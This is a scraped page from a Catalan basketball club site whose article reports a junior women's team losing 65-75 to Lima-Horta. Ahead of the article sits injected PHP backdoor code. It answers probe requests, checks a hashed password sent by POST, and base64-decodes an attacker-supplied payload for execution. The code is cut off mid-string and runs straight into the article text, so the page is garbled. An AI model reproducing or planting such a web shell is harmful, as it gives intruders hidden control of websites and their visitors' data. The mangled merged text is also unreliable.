function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior Preferent cau contra el líder, el Lima-Horta (65-75) - Tgn Bàsquet Club -

El Júnior Preferent cau contra el líder, el Lima-Horta (65-75)

Updated: novembre 11, 2021

El Júnior Femení Preferent fa un bon poartit però acaba sent derrotat per l’invicte Lima-Horta. Les liles van comença els primers minuts de joc amb la victòria entre cella i cella, encertades en atac, apretant en defensa i dominant el rebot. Van fer un parcial al minut 8, 11 a 4. Però les rivals no van tardar a despertar-se i els hi van tornar amb un parcial de 1 a 9. S’acabava el primer quart 12-13. Durant el segon període les tarragonines van contrarrestar les ràpides i ritmiques transicions de les barcelonines anotant des de la línia de tres. Al descans el marcador era de 33-38. La segona part del matx segueix igualada fins que en el últims minuts del tercer quart les rivals aconsegueixen una ventatge de 11 punts. L’últim quart l’equip entrenat per Rubio intenta remuntar però el Lima-Horta no abaixa el ritma i acaba derrotant el conjunt lila.